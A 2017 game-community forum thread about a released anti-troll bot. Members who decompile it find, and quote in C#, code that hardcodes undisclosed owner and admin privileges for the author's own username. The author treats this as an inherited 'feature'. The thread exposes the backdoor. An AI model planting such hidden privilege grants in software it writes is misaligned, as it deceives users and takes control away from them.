Official Everybody Edits Forums

Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?

You are not logged in.

#1 2017-08-28 16:57:25

goeyfun
Member
From: Mighty Japan
Joined: 2015-02-18
Posts: 667

[Release] EE Troll Catcher, Helpers wanted.

Stop Trolls using advanced analytical technologies

this bot stops trollers from vandalizing the world. Best for open edit world (if they do still exist).

Download and Commands

http://smarturl.it/eetrollcatcher?IQid=eeforums

Methodologies

The bot calculates a few variables generated from player's block placement. And by applying analytics to existing trolls, we could foresee when trolls are about to happen.
Been recently implementing some standard deviation stuff, should be live in future updates.
Sample Data

Wanna help?
1. Use the bot and see what is wrong

I've been working on few algorithms, some being more sensitive than others on detecting trollers. The bot will tell you which algorithm (represented by A,B,C... )has activated. Tell me which one isn't working for you.

2. Start trolling and submit your Log

The bot will generate a EETC_Log.txt file to log edits made to the world. If you start trolling and submit your Log. I bet i can improve the algorithm in the future. Please do delete the log file everytime before you start the bot.


Ug3JzgO.png

Offline

Wooted by: (2)

#2 2017-08-28 17:19:46

Zumza
Member
From: root
Joined: 2015-02-17
Posts: 4,645

Re: [Release] EE Troll Catcher, Helpers wanted.

Deep learning for troll detection, we've gone a long way...


Everybody edits, but some edit more than others

Offline

Wooted by: (2)

#3 2017-08-28 17:34:00

hummerz5
Member
From: wait I'm not a secret mod huh
Joined: 2015-08-10
Posts: 5,852

Re: [Release] EE Troll Catcher, Helpers wanted.

Zumza wrote:

Deep learning for troll detection, we've gone a long way...

is it deep learning though? I think he's talking concrete algorithms but it's hard to test for the creativity of trolls when there's like ten people online

Offline

Wooted by:

#4 2017-08-28 17:41:32

capasha
Member
Joined: 2015-02-21
Posts: 4,066

Re: [Release] EE Troll Catcher, Helpers wanted.

What is the link to the site?

Offline

#5 2017-08-28 17:45:10, last edited by XxAtillaxX (2017-08-28 17:45:59)

XxAtillaxX
Member
Joined: 2015-11-28
Posts: 4,202

Re: [Release] EE Troll Catcher, Helpers wanted.

Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Well, I went through the decompiled source and there isn't any machine learning. It's essentially the same as the old troll detection I wrote in the past, just rate detection and reverting changes.
It's probably effective to a reasonable extent, and although it doesn't contain any inherently malicious functionalities, it does give owner privileges to anyone with the username 'goeyfun' which isn't documented nor is there any way to disable it.

checksum

signature.png
*u stinky*

Offline

Wooted by: (3)

#6 2017-08-28 18:08:28, last edited by capasha (2017-08-28 18:14:56)

capasha
Member
Joined: 2015-02-21
Posts: 4,066

Re: [Release] EE Troll Catcher, Helpers wanted.

XxAtillaxX wrote:
Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Well, I went through the decompiled source and there isn't any machine learning. It's essentially the same as the old troll detection I wrote in the past, just rate detection and reverting changes.
It's probably effective to a reasonable extent, and although it doesn't contain any inherently malicious functionalities, it does give owner privileges to anyone with the username 'goeyfun' which isn't documented nor is there any way to disable it.

checksum

Me and some guys in nimg have talked about this too. It will force anyone to add goeyfun to the adminlist even if people don't want to do this.
The bot is old and outdated and is full of useless code. I saw atilla's code in it and bldatam is still there. Nothing is changed.

I also found out if you do .radmin goeyfun he will still have the owner access because its hardcoded in the tool.

//If nickname is goeyfun or nickname is owner of the world. He can do anything.
bool flag2 = player3.username.ToLower() == "goeyfun" || player3.username.ToLower() == Program.ownerName.ToLower();
//If administrators doesn't contains goeyfun. Add goeyfun to the admin list.
if (!Settings.Default.Administrators.Contains("goeyfun")) { Settings.Default.Administrators.Add("goeyfun"); }

Offline

#7 2017-08-28 18:12:20

goeyfun
Member
From: Mighty Japan
Joined: 2015-02-18
Posts: 667

Re: [Release] EE Troll Catcher, Helpers wanted.

Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Nah still manual review and categorization of which are trolls. Hope could learn relevant knowledge someday lol

XxAtillaxX wrote:
Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Well, I went through the decompiled source and there isn't any machine learning. It's essentially the same as the old troll detection I wrote in the past, just rate detection and reverting changes.
It's probably effective to a reasonable extent, and although it doesn't contain any inherently malicious functionalities, it does give owner privileges to anyone with the username 'goeyfun' which isn't documented nor is there any way to disable it.

Yeah was still based on the old bot of yours, cuz just interested to write it's core but not the rest //forums.everybodyedits.com/img/smilies/smile. But on top are a bunch of new calculations 'directional variations' 'distances', 'consistencies' beyond 'rate of placement'.
Yeah that 'feature' is also inherited from it predecessor //forums.everybodyedits.com/img/smilies/wink.
PS; if someone could opensource the bot, won't mind so everyone can contribute ideas.


Ug3JzgO.png

Offline

#8 2017-08-28 18:16:16

capasha
Member
Joined: 2015-02-21
Posts: 4,066

Re: [Release] EE Troll Catcher, Helpers wanted.

goeyfun wrote:
Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Nah still manual review and categorization of which are trolls. Hope could learn relevant knowledge someday lol

XxAtillaxX wrote:
Zumza wrote:

Deep learning for troll detection, we've gone a long way...

Well, I went through the decompiled source and there isn't any machine learning. It's essentially the same as the old troll detection I wrote in the past, just rate detection and reverting changes.
It's probably effective to a reasonable extent, and although it doesn't contain any inherently malicious functionalities, it does give owner privileges to anyone with the username 'goeyfun' which isn't documented nor is there any way to disable it.

Yeah was still based on the old bot of yours, cuz just interested to write it's core but not the rest //forums.everybodyedits.com/img/smilies/smile. But on top are a bunch of new calculations 'directional variations' 'distances', 'consistencies' beyond 'rate of placement'.
Yeah that 'feature' is also inherited from it predecessor //forums.everybodyedits.com/img/smilies/wink.
PS; if someone could opensource the bot, won't mind so everyone can contribute ideas.

How hard can it be to code from the beginning? This one have a lot of useless stuff.

Offline

#9 2017-08-28 19:46:05

Nebula
Guest

Re: [Release] EE Troll Catcher, Helpers wanted.

The only problem is:

Your bot is still an malware.

#10 2017-08-28 21:04:21

Tomahawk
Forum Mod
From: UK
Joined: 2015-02-18
Posts: 2,835

Re: [Release] EE Troll Catcher, Helpers wanted.

When a single block can troll a world, all you're doing is making trolls smarter and more subtle.

Reverting changes is great, but there's no good substitute for a human. Enable block inspection for all players, write a decent votekick system and you're well on your way to a self-governing free edit world.


One bot to rule them all, one bot to find them. One bot to bring them all... and with this cliché blind them.

Offline

Tomahawk1503950661675302

Board footer

Powered by FluxBB

[ Started around 1714165501.1068 - Generated in 0.211 seconds, 10 queries executed - Memory usage: 1.56 MiB (Peak: 1.74 MiB) ]